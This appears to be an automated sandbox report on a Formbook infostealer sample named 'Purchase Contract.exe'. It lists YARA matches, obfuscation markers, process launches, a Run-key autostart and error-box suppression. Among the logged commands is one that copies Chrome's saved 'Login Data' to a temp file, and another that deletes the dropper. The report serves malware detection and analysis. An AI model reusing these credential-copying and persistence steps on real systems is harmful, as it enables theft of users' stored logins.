Source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)Show sources
Source: Purchase Contract.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: updategtmlg.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/10@28/7
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\Purchase Contract.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Contract.exe.logJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3024:120:WilError_01
Creates temporary filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\S-zzxpJump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: Purchase Contract.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Users\user\Desktop\Purchase Contract.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Reads ini filesShow sources
Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\Purchase Contract.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\control.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: Purchase Contract.exeVirustotal: Detection: 32%
Source: Purchase Contract.exeReversingLabs: Detection: 45%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\Purchase Contract.exe 'C:\Users\user\Desktop\Purchase Contract.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Contract.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\S-zzxp\updategtmlg.exe C:\Program Files (x86)\S-zzxp\updategtmlg.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: unknownProcess created: C:\Program Files (x86)\S-zzxp\updategtmlg.exe 'C:\Program Files (x86)\S-zzxp\updategtmlg.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\S-zzxp\updategtmlg.exe C:\Program Files (x86)\S-zzxp\updategtmlg.exeJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\S-zzxp\updategtmlg.exe 'C:\Program Files (x86)\S-zzxp\updategtmlg.exe' Jump to behavior
Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Contract.exe'Jump to behavior
Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\SysWOW64\control.exeFile written: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogri.iniJump to behavior
Uses Microsoft SilverlightShow sources
Source: C:\Users\user\Desktop\Purchase Contract.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
PE file contains a COM descriptor data directoryShow sources
Source: Purchase Contract.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: Purchase Contract.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbolsShow sources
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.784714178.0000000007010000.00000002.00000001.sdmp
Source: Binary string: cmmon32.pdb source: updategtmlg.exe, 0000000D.00000002.1172851048.0000000005790000.00000040.00000001.sdmp, updategtmlg.exe, 0000000F.00000003.1178323049.0000000000730000.00000004.00000001.sdmp
Source: Binary string: cmmon32.pdbGCTL source: updategtmlg.exe, 0000000D.00000002.1172851048.0000000005790000.00000040.00000001.sdmp, updategtmlg.exe, 0000000F.00000003.1178323049.0000000000730000.00000004.00000001.sdmp
Source: Binary string: control.pdb source: Purchase Contract.exe, 00000000.00000002.809957748.000000000125B000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Purchase Contract.exe, 00000000.00000002.814464607.0000000005D30000.00000040.00000001.sdmp, control.exe, 00000003.00000002.2008031582.00000000045AF000.00000040.00000001.sdmp, updategtmlg.exe, 0000000D.00000002.1174356895.00000000062DF000.00000040.00000001.sdmp, cmmon32.exe, 0000000E.00000002.1171387497.0000000004ECF000.00000040.00000001.sdmp, updategtmlg.exe, 0000000F.00000002.1185902885.0000000005340000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.1184353663.0000000004910000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Purchase Contract.exe, control.exe, updategtmlg.exe, cmmon32.exe, updategtmlg.exe, 0000000F.00000002.1185902885.0000000005340000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.1184353663.0000000004910000.00000040.00000001.sdmp
Source: Binary string: control.pdbUGP source: Purchase Contract.exe, 00000000.00000002.809957748.000000000125B000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.784714178.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_00A62AC2 push eax; ret 0_2_00A62AC3
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05DADE2D push ecx; ret 0_2_05DADE40
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0450DE2D push ecx; ret 3_2_0450DE40
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02979A82 push eax; ret 3_2_02979A88
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02979A8B push eax; ret 3_2_02979AF2
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_029652F9 pushfd ; retf 3_2_029652EA
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02979AEC push eax; ret 3_2_02979AF2
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_029652E9 pushfd ; retf 3_2_029652EA
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0296521A push esi; iretd 3_2_02965226
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02979A35 push eax; ret 3_2_02979A88
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_0296D9CD push ds; retf 3_2_0296D9CE
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_00EE2AC2 push eax; ret 13_2_00EE2AC3
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0623DE2D push ecx; ret 13_2_0623DE40
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E2DE2D push ecx; ret 14_2_04E2DE40
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C2D9CD push ds; retf 14_2_00C2D9CE
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C252E9 pushfd ; retf 14_2_00C252EA
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C39AEC push eax; ret 14_2_00C39AF2
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C252F9 pushfd ; retf 14_2_00C252EA
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C39A82 push eax; ret 14_2_00C39A88
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C39A8B push eax; ret 14_2_00C39AF2
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C2521A push esi; iretd 14_2_00C25226
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C39A35 push eax; ret 14_2_00C39A88
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C33BEB push ebx; retf 14_2_00C33BEE

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exeJump to dropped file

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Windows\SysWOW64\control.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 6LDTLHHPCDJump to behavior
Source: C:\Windows\SysWOW64\control.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 6LDTLHHPCDJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\Purchase Contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Purchase Contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Purchase Contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Purchase Contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Purchase Contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Purchase Contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Purchase Contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Purchase Contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Purchase Contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Purchase Contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Purchase Contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Purchase Contract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
